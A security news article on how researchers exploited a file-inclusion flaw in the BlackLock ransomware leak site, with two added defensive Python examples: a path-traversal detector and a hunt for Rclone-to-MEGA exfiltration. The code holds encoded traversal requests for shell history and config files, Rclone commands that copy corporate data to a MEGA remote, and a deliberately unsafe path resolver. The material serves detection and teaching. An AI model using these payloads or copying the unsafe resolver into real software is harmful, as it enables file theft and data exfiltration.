In what is an instance of hacking the hackers, threat hunters have managed to infiltrate the online infrastructure associated with a ransomware group called BlackLock, uncovering crucial information about their modus operandi in the process.
Resecurity said it identified a security vulnerability in the data leak site (DLS) operated by the e-crime group that made it possible to extract configuration files, credentials, as well as the history of commands executed on the server.
The flaw concerns a “certain misconfiguration in the Data Leak Site (DLS) of BlackLock Ransomware, leading to clearnet IP addresses disclosure related to their network infrastructure behind TOR hidden services (hosting them) and additional service information,” the company said.

It described the acquired history of commands as one of the biggest operational security (OPSEC) failures of BlackLock ransomware.
BlackLock is a rebranded version of another ransomware group known as Eldorado. It has since become one of the most active extortion syndicates in 2025, heavily targeting the technology, manufacturing, construction, finance, and retail sectors. As of last month, it has listed 46 victims on its site.
The impacted organizations are located in Argentina, Aruba, Brazil, Canada, Congo, Croatia, Peru, France, Italy, the Netherlands, Spain, the United Arab Emirates, the U.K., and the United States.
The group, which announced the launch of an underground affiliate network in mid-January 2025, has also been observed actively recruiting traffers to facilitate the early stages of attacks by directing victims to malicious pages that deploy malware capable of establishing initial access to compromised systems.

The vulnerability identified by Resecurity is a local file inclusion (LFI) bug: a path traversal attack essentially tricks the web server into reading and returning files it was never meant to serve, among them the history of commands the operators executed on the leak site.
Some of the notable findings are listed below –
- The use of Rclone to exfiltrate data to the MEGA cloud storage service, in some cases even installing the MEGA client directly on victim systems
- The threat actors have created at least eight accounts on MEGA using disposable email addresses created via YOPmail (e.g., “zubinnecrouzo-6860@yopmail.com”) to store the victim data
- A reverse engineering of the ransomware has uncovered source code and ransom note similarities with another ransomware strain codenamed DragonForce, which has targeted organizations in Saudi Arabia (while DragonForce is written in Visual C++, BlackLock uses Go)
- “$$$,” one of the main operators of BlackLock, launched a short-lived ransomware project called Mamona on March 11, 2025
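To make the LFI mechanism concrete from the defender's side, here is an added Python example that is not from the article or from Resecurity: a file-serving resolver in its vulnerable form next to a hardened one, plus a small detector that flags traversal attempts (including URL-encoded and double-encoded variants) in web server access logs. The document root, the log lines and the IP addresses are constructed for the example and do not describe any real system.

```python
import os
import re
import urllib.parse

# Constructed document root for the example; it need not exist on disk,
# because the containment check below is purely lexical.
DOC_ROOT = "/srv/leaksite/public"


def resolve_unsafe(doc_root: str, requested: str) -> str:
    """Vulnerable pattern: the user-controlled segment is joined to the root
    with no containment check, so '../' segments (or an absolute path) walk
    out of the root. This is the shape of bug that lets a leak site hand over
    files such as a shell history."""
    return os.path.join(doc_root, requested)


def is_contained(doc_root: str, requested: str) -> bool:
    """Return True only if the normalised target stays under doc_root."""
    decoded = urllib.parse.unquote(requested)
    if "\x00" in decoded or os.path.isabs(decoded):
        return False
    root = os.path.normpath(doc_root)
    candidate = os.path.normpath(os.path.join(root, decoded))
    return os.path.commonpath([root, candidate]) == root


def resolve_safe(doc_root: str, requested: str) -> str:
    """Hardened resolver: decode exactly once, reject NUL bytes and absolute
    paths, normalise, and refuse anything outside the root. On a live server
    also compare os.path.realpath() of root and candidate so a symlink inside
    the root cannot point outside it (omitted here: no real filesystem)."""
    if not is_contained(doc_root, requested):
        raise PermissionError(f"path escapes document root: {requested!r}")
    decoded = urllib.parse.unquote(requested)
    return os.path.normpath(os.path.join(os.path.normpath(doc_root), decoded))


# Detection side: common-log-format lines (constructed sample, not real traffic).
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [20/Mar/2025:10:01:02 +0000] "GET /files/report.pdf HTTP/1.1" 200 5120
10.0.0.9 - - [20/Mar/2025:10:01:07 +0000] "GET /files/..%2f..%2f..%2froot/.bash_history HTTP/1.1" 200 2201
10.0.0.9 - - [20/Mar/2025:10:01:09 +0000] "GET /files/%252e%252e/%252e%252e/config.php HTTP/1.1" 404 0
"""

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
DOTDOT_SEGMENT = re.compile(r"(^|[/\\])\.\.([/\\]|$)")


def looks_like_traversal(request_path: str, max_decode_rounds: int = 3) -> bool:
    """Decode repeatedly (attackers double-encode to slip past single-decode
    filters) and flag any form that contains a '..' path segment."""
    current = request_path
    for _ in range(max_decode_rounds + 1):
        if DOTDOT_SEGMENT.search(current):
            return True
        decoded = urllib.parse.unquote(current)
        if decoded == current:
            break
        current = decoded
    return False


def find_traversal_requests(log_text: str) -> list[tuple[str, str, str]]:
    """Return (client_ip, request_path, status) for every suspicious request.
    A 200 on such a request is the one to escalate: the file was served."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if m and looks_like_traversal(m["path"]):
            hits.append((line.split()[0], m["path"], m["status"]))
    return hits


if __name__ == "__main__":
    print(resolve_safe(DOC_ROOT, "files/report.pdf"))
    for ip, path, status in find_traversal_requests(SAMPLE_ACCESS_LOG):
        print(f"traversal attempt from {ip}: {path} -> HTTP {status}")
```

The important design point is that the hardened resolver checks the exact string it will later open: it decodes once, normalises, and only then compares against the root. The detector, by contrast, decodes as many times as it can, because for hunting you want to see every encoding an attacker might have tried, not just the one your server happens to honour.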
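The first two findings above (Rclone pushing data to MEGA, MEGA clients installed on victims, throwaway YOPmail mailboxes) translate directly into a hunt over process-creation telemetry. The following Python is an added example, not code from the article or from Resecurity, and the hostnames, paths, mailbox, password and command lines it contains are constructed samples modelled on EDR/Sysmon-style events rather than real data. It also generalises slightly beyond the text by catching a renamed Rclone binary, since the `rclone.exe` name is the first thing an operator changes.

```python
import os
import re
import shlex

# Constructed process-creation events (host, image path, command line).
SAMPLE_EVENTS = [
    {"host": "fin-ws-07", "image": r"C:\Program Files\7-Zip\7z.exe",
     "command_line": r'"C:\Program Files\7-Zip\7z.exe" a backup.7z D:\Finance'},
    {"host": "fin-ws-07", "image": r"C:\Users\Public\rclone.exe",
     "command_line": r"rclone.exe config create mg mega user throwaway-1234@yopmail.com pass hunter2"},
    {"host": "fin-ws-07", "image": r"C:\Users\Public\rclone.exe",
     "command_line": r"rclone.exe copy D:\Finance mg:archive --transfers 8 -q"},
    {"host": "hr-srv-02", "image": r"C:\Windows\Temp\svchost.exe",
     "command_line": r"svchost.exe sync E:\HR bak:hr --transfers 16 --bwlimit 0"},
    {"host": "hr-srv-02", "image": r"C:\Users\jdoe\Downloads\MEGAsyncSetup64.exe",
     "command_line": r"MEGAsyncSetup64.exe /S"},
]

RCLONE_TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# rclone addresses remotes as "name:path"; the lookahead excludes Windows drive letters.
REMOTE_ARG = re.compile(r"^(?![A-Za-z]:\\)[A-Za-z0-9_-]+:")
MEGA_CLIENT_NAMES = ("megasync", "megacmd")
DISPOSABLE_MAIL_DOMAINS = ("@yopmail.com",)


def basename(path: str) -> str:
    """Lower-cased file name, tolerant of Windows separators."""
    return os.path.basename(path.replace("\\", "/")).lower()


def argv_of(command_line: str) -> list[str]:
    """Split a Windows-style command line; non-POSIX mode keeps backslashes."""
    return [tok.strip('"') for tok in shlex.split(command_line, posix=False)]


def classify_event(event: dict) -> list[str]:
    """Return the reasons this event looks like cloud-storage exfiltration tooling."""
    reasons = []
    image = basename(event["image"])
    argv = argv_of(event["command_line"])
    verb = argv[1].lower() if len(argv) > 1 else ""
    remotes = [a for a in argv[2:] if REMOTE_ARG.match(a)]
    lowered = event["command_line"].lower()

    if "rclone" in image:
        reasons.append("rclone binary executed")
    elif verb in RCLONE_TRANSFER_VERBS and remotes:
        # Verb plus "name:path" argument is rclone's grammar whatever the file is called.
        reasons.append(f"rclone-style transfer from renamed binary {image}")
    if verb == "config" and "mega" in (a.lower() for a in argv[2:]):
        reasons.append("rclone remote of type mega configured")
    if verb in RCLONE_TRANSFER_VERBS and remotes:
        reasons.append(f"transfer to remote {remotes[-1]!r}")
    if any(name in image for name in MEGA_CLIENT_NAMES):
        reasons.append("MEGA client installer/agent executed")
    if any(domain in lowered for domain in DISPOSABLE_MAIL_DOMAINS):
        reasons.append("disposable mailbox in command line")
    return reasons


def hunt(events: list[dict]) -> list[dict]:
    """Keep only events with at least one reason, with the host for triage."""
    return [{"host": e["host"], "image": basename(e["image"]), "reasons": r}
            for e in events if (r := classify_event(e))]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(f'{hit["host"]}: {hit["image"]} -> {"; ".join(hit["reasons"])}')
```

Two of these signals deserve a high-severity rule on their own: a `config create ... mega` invocation (a remote for a consumer cloud service being set up on a corporate host) and a transfer verb with a `name:path` remote from a binary that is not called rclone. The other signals are better used to raise the score of a host that already has one of those.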

In an intriguing twist, BlackLock’s DLS was defaced by DragonForce on March 20 – likely by exploiting the same LFI vulnerability (or something similar) – with configuration files and internal chats leaked on its landing page. A day prior, the DLS of Mamona ransomware was also defaced.
“It’s unclear if BlackLock Ransomware (as a group) started cooperating with DragonForce Ransomware or silently transitioned under the new ownership,” Resecurity said. “The new masters likely took over the project and their affiliate base due to ransomware market consolidation, understanding their previous successors could be compromised.”
“The key actor ‘$$$’ didn’t share any surprise after incidents with BlackLock and Mamona Ransomware. It’s possible the actor was fully aware that his operations could be already compromised, so the silent ‘exit’ from the previous project could be the most rational option.”